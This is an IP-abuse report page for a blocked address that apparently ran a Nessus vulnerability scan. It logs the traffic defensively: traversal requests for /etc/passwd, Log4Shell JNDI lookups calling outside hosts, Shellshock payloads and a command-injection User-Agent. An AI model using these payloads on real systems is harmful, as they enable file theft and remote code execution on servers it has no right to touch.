abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 46
- Unique targets hit
- 1
- Unique paths probed
- 1,791
- Detection count
- 15
- First seen
- 2026-07-16 08:17:25 UTC
- Last seen
- 2026-07-16 08:26:10 UTC
- Block expires
- 2026-07-17 09:17:42 UTC
Sample paths probed
- /scripts/base_main.php
- /scripts/bblog/index.php
- /basilix.php
- /scripts/bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd
- /bblog/index.php
- /scripts/basilix.php
- /base_main.php
- /cgi-bin/index.cgi
- /scripts/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd
- /header.php
- /bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd
- /cgi-bin/base_main.php
- /cgi-mod/index.cgi
- /cgi-bin/bblog/index.php
- /cgi-bin/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd
- /cgi-bin/start.action
- /bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd
- /cgi-bin/basilix.php
- /cgi-bin/index.php
- /cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd
Sample User-Agents
- ${jndi:ldap://127.0.0.1#log4shell-generic-P9ePRe1ICtcDEZZGP32t.w.nessus.org/nessus}
- "; system(id);#
- ${jndi:ldap://log4shell-generic-uvd9MSCBrrjFTHEcYcO2${lower:ten}.w.nessus.org/nessus}
- () { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo "bash_cve_2014_6278 Output : $((32+87))"; }
- () { ignored; }; echo Content-Type: text/plain ; echo ; echo "bash_cve_2014_6271_rce Output : $((0+58))"
- mercuryboard_user_agent_sql_injection.nasl'
- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
- Nessus
- ${jndi:ldap://10.8.1.2:57047/nessus}
- ${jndi:ldap://log4shell-generic-RiiBPS9zQKtK3S6oy3kn${lower:ten}.w.nessus.org/nessus}
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.